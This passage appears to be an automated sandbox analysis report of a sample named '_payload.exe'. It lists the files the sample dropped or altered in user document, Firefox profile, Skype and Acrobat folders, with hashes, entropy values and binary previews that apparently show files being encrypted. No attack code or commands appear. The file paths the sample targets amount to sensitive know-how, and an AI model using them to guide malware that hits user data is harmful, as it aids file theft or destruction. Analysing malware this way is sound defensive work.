                                                                                                                                                                      Preview:UOOJJ..}.P.w...n ........83lB@..........\.%`[.]%...f.l8.h).j.g2,.......Do...........qR...A*.....BP...(.....~..... .ni8.....7.`....D5...^..Y.... .n6............&[.9..I.#?..Q....cgV.....u."....../.....;E@K..?I..a.;t.h..hA...'...4h..]..H.~......<..h:^...[.'O.#.;k.P..j.b.J.......-.....\W...cp...P.4..kda...r......).&.Tz'.....sr.i..w......Ht...........P..!B.....".]..M...@..C...../w.d....j.....U.K5....$.N..m...6hu."...K...J....I..n.....[.aAKmA...@(a:.j.-H....8....9..8E.....O....z.+...xO.....%......-u.u.*Af^.g.P.D.\x...A|....P..S<.bz.R.u...D..X$....-...._NE3.1.....[.1...;@!<..p.V8...TB.!........4._.xY&.wS..e.i....H;.....`5Q7......G8{a..#4|B...u.Pa.;<.....z.d'..t."28.O..&..1......dI...I;.|....._...S./.U......;.a.@.y.=7.....y.4.KI..}.@. M..wc..s.;.D..s.R....z..MF...L\4.:C.......1...+.#7.I`.q.......a0".8.W...z...L..ml|K.7oO/...]d.X...CVr~.[m.}...7Sb...>h3.m....K...1...&.................L...g00.?..w..qi.N.B.......r...3i..I=....>r,.w/...........$.yV.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VLZDGUKUTZ.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.841840702538241
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UT5hpKlAbneKZP2pezkz0669xLP5aUoOmZxRcy4GzJXsRLSlsIsxkrnP2bD:ms8fR2l+7LBaTOmZxVRsBIsmQD
                                                                                                                                                                      MD5:B2A1F6E3E826E53519B2CECA5855E420
                                                                                                                                                                      SHA1:6E32F7616DDBB7A6542BE16649095C6406498548
                                                                                                                                                                      SHA-256:EA02B7C313A463C9DEA8156AF4379E9EDDCE377BD0AA344B62D5CF9AB645F4FA
                                                                                                                                                                      SHA-512:05EAA9E100EF4261581E7E3597EFD153EC5978B3DE9E28F29FF8B6F81941A2CBA7D834563BEB152C88F70958708AA943382E692CD5880F5A803DA36EB05217AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDGp`Q....;..3l..B.....f....xN.6.p.>r..Z;.D....Hq..._......4s6......X..?|.....x..r..B.Hv.U..~.YLQ...5.*..2...|GtE..|.z...'........PRVfT#.\a.<...0.<z.:..&M..<...SCV....[}......H...g..d.<X=.Z.RP|......7"2B).......<8#...-....F/.A.(....B=.;....&.A;.._w..8F..y..k.1F......W..(..."4.......b.3...H..VN......4G.x....v..b.HF....:.....v..H&;.T{......F..E..E;....4.z)L.tax......|G.TY2.....}q.V.[.St.j._.S.\?.H..P.g!.&.q7.RVUx.#.}.......z.0..|..U.j..M...z.....P..l+jjS..8Zw.Zc...d].b.v.8.z..c.N./.....8.fwP\..r.&..o. .-...C...,i..../vF......:WB.r..1-Q.....4{{r..Rnq..."U&..:.l....d..\..].m..#7.8=..!5..r..d.....Y..`z.&zCx?Z.#..;.....r...p,..9J>AJe.S..?.....Ce.d.rN.8..9A{AJ...85F.zG.@...1.......}..DX.*#...D5.H.c.....;...[......L....|!(...._3.L.O}R.rJ...o...f......>`.k._._[.L.....L.IW?....C]...4.........=..........A.C.....`._.,.\.+Y.c.......0.`.]O..eN...-...^s......2.......\\...!wT..4.b...S..|qA..g.......R.3R..... 9.79..v..n!v<m..I...D....8w.X..!....\...$..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VLZDGUKUTZ.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.833451924504793
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EAXzwEl/mGSdgWviGIgHpMctGKrkKxgVt98H/Jzqc1b/yaLzwUNJnrM2bD:XXs63S1viGpHprtXkKxytSfJb1Lh1NFL
                                                                                                                                                                      MD5:AF91908148A78B32E52C42C31D62FAE3
                                                                                                                                                                      SHA1:F99F1FB39C9409244D7B5FC60C3F7DCC82C235E2
                                                                                                                                                                      SHA-256:FE2A68D6D63A08A00EB8F517D4AB5F16218576903CA6139F8D7E92537F669393
                                                                                                                                                                      SHA-512:AB21AC3DF6248C5D015BC57C85718C114D99F84AEC0D4BBFD72FEA008AFD5A725FF2A7A36979423BCEBC2652AC177B723902D89217849B050947A75C151BE95F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG/.]Tw.c..a.........Q..}.6..MI...*P.O...c..>.E...z.0........?$F.g...F.`.w......H....$^k....7zd.?..h..K(...`i.*.4X.... ....f...M^.a....4....N..C....{z0c......ZJVo....S`..d....h.$F.8.=.V9.5....k>V$..J.%m... >.1.O...0.@.E(-dM...(E...pY,.2U....V.....q....m............r...(.g@=.-.-xg).H}.p.Jom.~4.......]8>.......hr9v/J..vX.O.....{..9d.\.r...4..(_U........L0.q.F|..R.q....DZl4...a|....[G.3.m.Q.....RNK...V..L..7.n6O.7t..M.WH...w..jc..J.4./*.......Y.n.r..}.B...Z....f.7..t..I.O.q..1.].......'.[:.J.T..l.3..l.p..|.....(.....{..0w.W.z#U. .3...=g...]. .PO...K(.)...........J.S....>S...^..`....N...O.1.D.....=.....l.a.vR.....M.m.......KT.w.!r.s).<....).R'R7a.}..._Q0)8...k.W.=S.'..|.r...c.(6..G.0x..]....<6.....'......=..YF.U2...(..........c8..$.Qt........'..7..?;-*s.Z.4X.b.I..OS.<....F..B.Q..DB.....i&.(mh7.....DS....7.7.........sw.2a.TBt.2VEj...:.r..K..C..P.......i60P.V..3..X..M... ......a.....>..G....j.t.......3bc..e....zt..D&.D[...,1.iJ`...~V....s

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WKXEWIOTXI.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835041292048504
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KFHZG1Jp/gADWwW+YUPqr8qywel/jJmyVRRYdg9duGyQsuboUxPlgOs2bD:Kqzp/Yw5Ywq46ijJFVUSuGNvoEP1D
                                                                                                                                                                      MD5:FA796DE49931F1835B12D762E3169910
                                                                                                                                                                      SHA1:5B55B1B5D35C6D5756BDE45030DC0B4D6B06E967
                                                                                                                                                                      SHA-256:B90938194D14603F354C912F4DFA0EFB251B6B70F2E9219B2CCCA7F23C67520C
                                                                                                                                                                      SHA-512:AC34277A8BAEED2DF7C4C9AC307C31E235B4784BD0166D16D78BB3B338F245F8EE5CE0FC2BBB82CB0126D1E916BB6A812DA016DFD3D9B481877EC366923EAB52
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WKXEW).....&......"............{..``7L.l.QG[..........1.K&4.C[.b..h.$......3&.2P......?!.#A...l(..,.....L.5~..gk....C...'.];,!..d...b.5..._=..,6..D.E.{.......&...(..w..|.tJ........FC.K......_{EV..`...$..j.*?.....D*w.Lt....c....=..(^.<)u.:v.......U.|._....$..C......|..oH..|.RG9.#C..#?...^....Y.c_mT..WrM.Fu.hE>.S+)v!.O+}..`4..l....<.u.@[gw:fF./.W...o...j..+V...G;.Z..l.....4.K.E&h]..G....O...1...?..........S.I..^.I./.w..V.G......+..3~.JLCK.....r...'ye....y.q........Q!.=.,.<Px&.. ..q.K ....o2z8..<..G!...V.k+~W..Q...s...7...%/.U5`...3I)s.~.K..maO.L}p!....j.s..@..}.F..cz..|.'....!.(........h.....$.A.V....XQ7......*....f../.m...:^...c.....w+B.........-..D..7...i.....k.|...2...6.h....V.j......W....-..2.^.+.f.....>.. a.fB,..R.`.v.pfn...W....D&.F.......S.U..$.$....z'...UU..W......$.P=rt.-|..VO6y.....l.dR}j...p..oV....&_.,.d....[C..1@..8>..G...>2wu.....&.....2#.q...y>b.4Q...6....jG<.p'U..\.~".4...]..TG."......3....I6\F.3G.U...p.W..3p.h...0..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WUTJSCBCFX.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8559144289756375
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9rHw/nTuN5NfdrvuJRHq30rNPGmgTGM/HN12MuBDw/zNKEB2X54bDm2bD:tHKTu/NfZv0RnNPnSGGN0Zw/5KEBQYBD
                                                                                                                                                                      MD5:B9711670531FEBCE4C33C146055699E5
                                                                                                                                                                      SHA1:F5D0D0DE7DC7311389A6F416714DF70C165CB401
                                                                                                                                                                      SHA-256:EC3AF836865BCF9E100EC823794FA52199C25C524AE4F9B64DBBDCAAECAA8EE0
                                                                                                                                                                      SHA-512:B1FA7057CD8B32336B37EFD9A474122E7F1B694E3E0B1F551478AA901FD87E54415D1024BC36546D79C26F66EFAEB1BF5521BFCAEEE9FA18C38E73CE7A90F851
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WUTJS......A.}Q,..B|.....#..$1M.<....A.......)..vgE.U~.._. :].'........O..?r.'....>..W.:.....++.....8R.Q.a.v.+.=..m$....~D..2|..s.V0.p5.oZGiF...\v..4,....j.V.P.gm..>e.W.J.....PX.C.....5\....y.].4.Ja.3.....S..?..]..p.H...|..*B....9..3][s.....f...tlDT....3.(...|!.n..@..}....v...?.k2.r...;.Hk..@..r...)...$.cl.QP?'.*........T/:.WQ.......N..D.:*_.<.<g..Z...u..0...+..8..c...y._..L....1A..h(.b..i*.|..D......4..~.}.....j^4F@.P...S.}^8.n...F}G.......!.........=......yg.E......".y>...p\.e...H.|91=.-.q...G.c;1%..0P......]ku>^.T./J,...-N.gz....F...w.b..[s.Q.C.......":z.'...S...u.Q.......Jl.HB...Dfz-.Zp....Y..".E.&....@... \)..8&...o...T.43WT.c.....1...._,U .;:K....+yl.h..j.I....K.\X.g8..*...%.qz.......5.W......B.FDV..?._*...:Wg.2.....L..eu.[.....k..s..=...... ....[..cS.-"..p......s@...{.?.ac.._.;.K...w71....$.#F.........k..u.?...(.A......(...j.:a....FA.B ...5..?4.O.XR..y..a>.m..j.m...m...>.).;^...y&...U6.%..N`s.$.[D.Xk.-..u..Y.....|.I

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XZXHAVGRAG.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846586609872814
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EqPuGN/rVupKtKUtjma37tV7KkenvY1qlL8KkRc3VuiouzkCtYlB2NXpvoQRQ2bD:EqPHhrE4513ZV7Ktnv6CAmXou/A2X9XP
                                                                                                                                                                      MD5:CC0F57AFA6E362E4B1986D0C7B515331
                                                                                                                                                                      SHA1:6140689B35EC833DFA822663646F8D12A3FE24A9
                                                                                                                                                                      SHA-256:8242960D62D6D6B1528939955BC8181C6A1336C3052D476703A1B98920AC146B
                                                                                                                                                                      SHA-512:CF2A586149CF2020A01921BFE6E8BC39F745C9563BA17F98374DB8D78EE76B4CD266EDE31AAE649AF23D84E6E46FC74022993A6EF29A01DBB7995B384CD153BD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA..... ..y..f.Wd..M..Zu.....(.B3.......<..r...].........fH........O.(..L.+..Us...L....A. w.....V-.K.eG.\.l.Xke`..oN..F...E}...........sbKTyaT.84.O..6.(.......Dczy.iS_.I.....e..wz.|.{........... ....^8.iN...w....`7!....M'..g..E.q.]...;.].0....+;...6.x...Y.........[7...u.m..R3-5...R.ET......Rt.i.Zb.......rs...I.3)...Q*T..'....+........[3.9;.4...MQ..5.......'=/...Dd......-.ZP..Z.8...<...........yd[..=.J......J@...{4.^6p.....x..j@..v.{.....Y..4...:..........JdjQI..8....W.0.....c.u.."&.5.<..g.....F.wpb.D....s.....cC...$..'K..(&...0..i{]....W..aW...x.YCQA@,..L.yW>))%E..n.Esq.....p3...~.[.-.,>.......... G.d..{G..D...<.i.U......D....@0...;.'..\."t.q.n...9@....(:.uO.V~.....t@._.YNI.............P9.z...."..Zt.A.L.f."...j...e......+...*...C._....P1_E.....O.}...N.PN..a..G...T......C....t.V..^.....iM..rx.6..2.......i.6\/........!...u....p.X...j..pm5...s......mM......zUA|........qSK....n...V..c.cU...7.q..wz..p..a.e|.h.H._(.s...9..!5.5..........E.c9.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):495
                                                                                                                                                                      Entropy (8bit):7.568563739715799
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YWvoIhlVFHPqpwX/D9x48CsGck6/fSubQSUdNcii9a:YghkGDZCCHj2bD
                                                                                                                                                                      MD5:ACB121EE16551866D60DAB553F9A6B0D
                                                                                                                                                                      SHA1:3CEE7100ADA8DBA9A1691A615A3EFE992C9021E0
                                                                                                                                                                      SHA-256:5B7D5F79FB1C3797F6421914044CC93339331F534D5322FC4FF083B525F865C8
                                                                                                                                                                      SHA-512:3A30ADC2D190230BB220BA1C9C5B5123B54FB9E31B5B9041CCBD30E8046F691E463542C4D3ABF4DA36152B9B5F38C1516662A6A8A3835685665A5509A6630726
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ses1.+$S.,(..=._6.\.>.y....,.|..>...........%......]...........R...@.u2.....t7.3...&.....0u.J.H..`......D+@..)...p<1=..P.L..]v.....O..z]..........._..W...._.;r.........C.cBw...If*...p....o1.}.8.#.;T#ZT.u6..AK..u..~..o3....>.H...c*nH..j...{Ud.6.L{.....y,...!.v|..{.\0I'&`.d..........X....y*Z....f.y....$..b\..H=&..1...*f..c(sl.....e.`/[ff...?.t:.*.......v....K%X1...hi...=....,w....]."...#.ZmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):385
                                                                                                                                                                      Entropy (8bit):7.347638679956694
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YGWnOtwxdmSQqMPfLeZcPhUSSUdNcii9a:YvnkqmSQqMPSQhK2bD
                                                                                                                                                                      MD5:B48A75D30BB9FC354E9F2903C1E6A27A
                                                                                                                                                                      SHA1:CC6FBFAA78EF7EF2D952C66E7C31AA28F2166E5F
                                                                                                                                                                      SHA-256:AF7305C9118B0C1C0B2AD8991506C6FFE945347FEAFB03DDB697DCA73456E89E
                                                                                                                                                                      SHA-512:A69902BDB5174B597AC66FE8A550DB695E2B351F2D43CC627069BF6A005CF90C59FE55EB7A37C15604DE37CDCE047B09B1019FFBC8B15B1BFD267F70C684B429
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"cli...u.a.7..%..|....m..(".y....&.]$S..#K...|..p.uBc...5AM2..z}.].w..!..'.j}<K..9h.........u-._..a.%...K..e.e....c...KZ<.......2Y.Dv....v.-..Q1.....V.v.5......$.r.Pl.0>....TW=.K..c..8....U..(..{o.@,rS.b6.8....l.....b.}...|i.{P.4......){..B.M.|.X_......T]..C53.u&.Zd..\...3o6...L......s.{.#@.#.qEmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1550
                                                                                                                                                                      Entropy (8bit):7.873819635292819
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:1S52nK9cMufTnCbCG2vw61s79KS9Jyq73FD:7KmM8ztPv7zS9Jyw9
                                                                                                                                                                      MD5:A0166AB8ADB9460A5F5A359122394B01
                                                                                                                                                                      SHA1:C3442694BD248DF28EC1469B818CFB9950493EDA
                                                                                                                                                                      SHA-256:20AC1D1DA227A06A191292F55E44486690210945B631031F7B111323D9FA95BB
                                                                                                                                                                      SHA-512:AB9F33C660368D8DA85A303AAAC8475A19781C8FB39227F3B5F4760CD079E78F475796954975B4FC77A8113969A3B4F0D6D5C9D086FB8204A2D068EFBA8E4855
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:mozLz.)....|...x......s}.$...8.m.&N....:...G..c.!$R.2.F(.pDuz].m...c.(D.6.BP.....c.........6.7 ."d..{.NNl.h.^{.<..;..Qp>.O.......IZ..b&...Ru......l...Ch]Y...oYdQ..../...........7.{R>J.....*o.....[OR....y..j*....Y#. .........S.......!.<..K._.d`Yz.....F..VS<.>..f...... ...;%B...T..C =8.w.A..1....R.F.....!..Dk..T0.{}....8...m#.Q.J..~s..P....3Vm.HL;$#E..yJ.}..-....~.x...I.A..."..>l.U9i.#K.fJ..b.+Xei:J.......w..I....O... ..o.Q.p.....b..ow<..YRu..fj.*...q.X.nSmw.r.1...0..Z....3J....6.;HF!b@Ps..y.-.....Olj.U<=.v...-W.O..xM6.~..u....X3:K...M.,.C....D.......0J...WO&.+.n7s.}.....Be.RX{...R}.a`.Z..h...SA....K.)...'.].v..#5>Xk..]..D....N...y......0......B.Q.....^z,eV4....v........./}....... .71{^.OD$.uCBI....(.I...+...@....e.KgU.+...36.,V.#+..<M..0.....'....x.J.....%!U...e...;.w.D.(........M....)...:..u2f..C.bi...%....9..{.H...T.O.t..-M..|~p.....(1..k..D..wX.b5.jtV.Q..E.n..6.eI.;].".+...:..?.(Fq...R..I...6Ne*.jX.i..'..&..{.......O.`tt4u#..]uX.P.<.....s..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4749
                                                                                                                                                                      Entropy (8bit):7.9544635333309035
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:+NHQGIVRHwkLdTg6WLpjeJZERU7qY/23S9YjWQ1s4:gHQ5/QkLdtWVyJaU+Yu3pjWgP
                                                                                                                                                                      MD5:F85D96C1B6033580D888E0F920F10518
                                                                                                                                                                      SHA1:2DE073D8DA5AA518956C4A4932A21F526554EFF4
                                                                                                                                                                      SHA-256:962CB17FEFECD81998768D63C407617A8894D0A55E2B3C6D4193934CA33A4C5D
                                                                                                                                                                      SHA-512:A89729F4BF073546449FFDCF6DDCE0FDDE162D812BD7849B4F306932356245F730A3A4C28AE05F5FD446B6AC75208FDA057B0F56791D02F546B52C92679BB775
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:mozLz.....xEt.d...@....v..M.u.".:%$T.YU....w.e..Dd.I8...N.....C.l.Yy..k...*{.Iu.6..........!H.|...II2P.q.f.....`._.+h..../.4.6j..}T..}...w..l9..l...^...E.5.f....T...p.$.2.).DC$.Xh.P.&.......h..|.i.....C...En_?.)r..J.........Qtv4...B...._........y..h...CT..d OB..|.W...... >.[{......(>.|G.a..H.+ .l]l#.,N$.H.3....[.u.6V%.`....s.i..V.T....``\..c..{.6.or.T.5w+..3.....Z#?.1.5....|)&.l._>r....e.is. .....$..iJ...Q.[l.N_.>..f...u..{.9.P...2.R...,..7.b.~......-...60...3@...L....xy.......f..?....h...._<..ozS%7...mV.O#....s....l%..5...4.@...o.f..c.c.N\M*.3.-6.........5.;z..+....:..,....P....w:.|.s..,...qZ....B5..i...........9..85VU.q.|....l.a.....&....#B_).WO.7.5.1.fL.J..r.BI../c. "..L..,..h..@d..;....k.L/..(..p.../..W[..l..Xp.i%.s..M....._.....N..zQBKh..S..r|C.r.>..z....}4_!...N......X..b...:.@..y./...(..3#d.e.-L.......F{g.{RE]..O.5.....>..1Eh..xSw..{.].M.m.@......{.j...(.s.O..3.TJ..+..A.j.S....f..d....m..L.....N5=o8..u.....A..B..@.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):131406
                                                                                                                                                                      Entropy (8bit):7.998522437159998
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:O+WUAn/9BS834A0J7BSFV9gHljPWGI7cX/2f7344UUYsJVyY4J:LWHVBS827BSb9gHljeG9uj44NYkVyj
                                                                                                                                                                      MD5:CFA165217553D5E2407E44853242E324
                                                                                                                                                                      SHA1:412CB49308F3A51440126D51787C1D7AFE2F8311
                                                                                                                                                                      SHA-256:473EB600A220B20E298E54561EF0CA1B339637B9A1EDCCDC98FDF2D05083E249
                                                                                                                                                                      SHA-512:969A38EBEB5CE96560DE6EB13A68B2C317584E7B3B167FD8B249E29F9EC6B7D43AFCBA5CF88DB8A02461BFC9109219B18EE1FE16FF4A79B5738E56B0EF2AD8EF
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:SQLita.@..b...'5i^....U..........E........F..2..X...7..j...R.o./.jeE.'...c.g..j{%....:...P.....>..\..:.5{...r.4..3.s..=!..[. .....uUR.x.f..G..9.g~a/V.a.:E..j...^>m.vH.Q.).p.8z0W0s..^.o...a.C.}.|NX.g..L.....\..r.J...r...y.K.n![...;ZD.I.......I1".O.>$....f....v..vn.D1s.N.q...$qR[.......N....V...Rl`S..:..V....X.IN.#=..tK..s/q..+..?.._L.n...U...[..R...9.N..*.........@..l3.$.V.W...z.W.V.:...XG=,.q@..3..Q\.XD.9.......r}&..e......O....p<.).av.].?u...1..4`.+...6.>.8u..u.?..1)..-K.....x.H..|'>........l..*.}....s..2h...&.p...w.w...Y0&c.4..&..j......8.Au._d...(.m....T..^.C#..#.n5.....o.Gv.].5.....5....$....NztsPg..}JpHc7..#<..Tb...i`NY.D.......`Ma.@..tL.^.h..W..k}.3.\".]..a#....M/...}*.../..*...r8..Z......... ...A..ID..=.. .m...!7H.D.b.=e...DQ......g........g..}..!.qu....m..5..H.....9...P......:k7.%.....H..}>H..<.,..Eb}...S.Jq..>9.L.....-.....X..%.&b..vY*...^...$A..........~......o..0.Q....U.5..g.......5q...GIAW...N.5_.1..H.)5)%.&6.q|.%.l

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Skype\RootTools\roottools.conf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):410
                                                                                                                                                                      Entropy (8bit):7.358658106020719
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qjXBFyd6lTqDElo76fSLAPhJYhqqHPN4p5SUdNcii9a:Dd3DElm6KcnCDwM2bD
                                                                                                                                                                      MD5:429A966B0D8D33A0AE7B8850B0B81B2B
                                                                                                                                                                      SHA1:FD07CA1872E138A99680742C846FE87603C4D889
                                                                                                                                                                      SHA-256:7F25E8C5D500198D2BCDB38A45772806385ACABC2A1682AF08DA3F8D208AD5AF
                                                                                                                                                                      SHA-512:360F65495B7FDD11B65F1B631DD7F469D9F7EECCF0D8321A1661AE2460EF06FD112BFA359D4BB14B833E6AF22E236F478A7C342E2DA712B4FE31B0443DB96F0B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:node_w3..............0.V&..+R...".u.IP.'.1..N..Y~..`.}.X..2.uo..Y[...1k6..N=....*....f._..@.r6.vlt.Y=.!.....pN."5.P|]a..}.aH... .J.....EX..|.W..t..^....n&J..........E.?..'........3.Y...A..uu./nD.F.dSO..........l}76.]a.o.~HZd...ms..@. &VE.2..__.X._~T...s7~N......S.....d.....B....$<.h....#...X./.R=Z.......@~l....c}{d.-.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Application Data\Adobe\Acrobat\DC\TMDocs.sav.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):370
                                                                                                                                                                      Entropy (8bit):7.261718912141876
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:Bk+Zixtrq0jUO6gy/yVS48ZQTi9yFNrHxis5D0Y3zP501qLljDI3r0wknIS1WdNX:e+Z+PSKw4EORx01qlI3r9SUdNcii9a
                                                                                                                                                                      MD5:57BF998DA9CDDE5D16E1522BE80098E2
                                                                                                                                                                      SHA1:C645AE3DEEBD033356CAA7EB75B76098FCC6837C
                                                                                                                                                                      SHA-256:552566AA8C248443AAD09933523B37014D6FDEF2B3843D3A3D753124580D24A1
                                                                                                                                                                      SHA-512:89CAE7A352D8008BFB3A65F70CD4C68FC8B049C7E95671A36A4FC0AF18BEC5ECD5C998CF7B0A3633D495C23B8204900BF032B592FCDE796F42D8EC9AABB20BDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:%PDFT.z'..Mo...j......u.0..\..\.~7.e..r...t>Oj.........W........l./..2....=Z%_{.k.4Z....Pu.M...*...w.._J..]..~.+f..A.....@..[....1.... .0H.M.k.'y...C..ey.P.S.y...p...........!eq...=i.Z^.zk~~.~,.r[.[+.....I...7..0]G.=.%V*.]Xh..!eP......@4....P.p....\q.PY.c....7H8.!j...[..%xun#)9.pg..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Application Data\Adobe\Acrobat\DC\TMGrpPrm.sav.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):388
                                                                                                                                                                      Entropy (8bit):7.304914270460438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DYKzesR+mpao2agV7ZPcR7Wm3kF3PRNSUdNcii9a:DYKzeq52x1cR7W5hPu2bD
                                                                                                                                                                      MD5:555152DB69B4FD793DD3FB8D3F359C01
                                                                                                                                                                      SHA1:A4E425BDF5AE5F89C07A30D8A1888AAA7E2B3AC0
                                                                                                                                                                      SHA-256:95AE1C7DA1E5797EDAAE46ECB34B4C3DCD35F6992979D982B0C10E038566A169
                                                                                                                                                                      SHA-512:D5C1A02B5F6A19568F92341C07F72C2B2369DA8F598A6941514DCBF9A5A5672760C92BB3E2FB013D8F11201E3ABAD5394CA6F597556A52236812AD339BF3DDC9
                                                                                                                                                                      Malicious:false
